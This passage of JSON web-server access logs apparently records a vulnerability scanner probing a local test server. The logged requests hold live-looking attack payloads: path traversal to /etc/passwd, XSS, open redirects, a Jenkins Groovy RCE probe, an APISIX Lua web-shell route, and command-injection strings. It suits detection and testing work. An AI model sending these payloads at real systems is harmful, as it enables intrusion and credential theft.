HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"return=index.php&username=administrator&password=root","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /revive/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /karma.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /applications.pinpoint HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5C/%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /stat.jsp?cmd=chcp+437+%7c+dir HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/database/selector/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?return_url=javascript:alert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/123contactform-for-wordpress/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5C/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NCFindWeb?service=IPreAlertConfigService&filename= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /control/stream?contentId=%27\x5C%22%3E%3Csvg/onload=alert(xss)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /new/newhttp://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?view=log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"username=admin&password=admin?show+webmaster+user","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jquery-file-upload/server/php/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.018","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"{\x0D\x0A \x22uri\x22:\x22/29N5mCGmKk8eCWlBnr6sSLmwcxg\x22,\x0D\x0A \x22script\x22:\x22local _M = {} \x5Cn function _M.access(conf, ctx) \x5Cn local os = require('os')\x5Cn local args = assert(ngx.req.get_uri_args()) \x5Cn local f = assert(io.popen(args.cmd, 'r'))\x5Cn local s = assert(f:read('*a'))\x5Cn ngx.say(s)\x5Cn f:close() \x5Cn end \x5Cnreturn _M\x22,\x0D\x0A \x22upstream\x22:{\x0D\x0A \x22type\x22:\x22roundrobin\x22,\x0D\x0A \x22nodes\x22:{\x0D\x0A \x22example.com:80\x22:1\x0D\x0A }\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apisix/admin/routes HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zm/?view=log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /static/../../../a/../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"username=admin&password={{admin}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\x22onmouseover=alert(document.domain)/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/idx-broker-platinum/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29N5mCGmKk8eCWlBnr6sSLmwcxg?cmd=id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"notdelay=true&command=cat /etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cli.php?a=shell HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.settings/rules.json?auth=FIREBASE_SECRET HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_something_.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aj.html?a=devi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /forums/search/z--%3E%22%3E%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /HelpTheHelpDesk.jsdbx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"{'jql':'project in projectsLeadByUser(\x2229N5mATkUcWSfYkRfqxTZlBjpEg\x22)'}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rest/issueNav/1/issueTable HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ampps/index.php?act=login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download?type=files&filename=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29N5mBFdvCUUTsSr3cdFdAeBGZQ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/..;/css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", 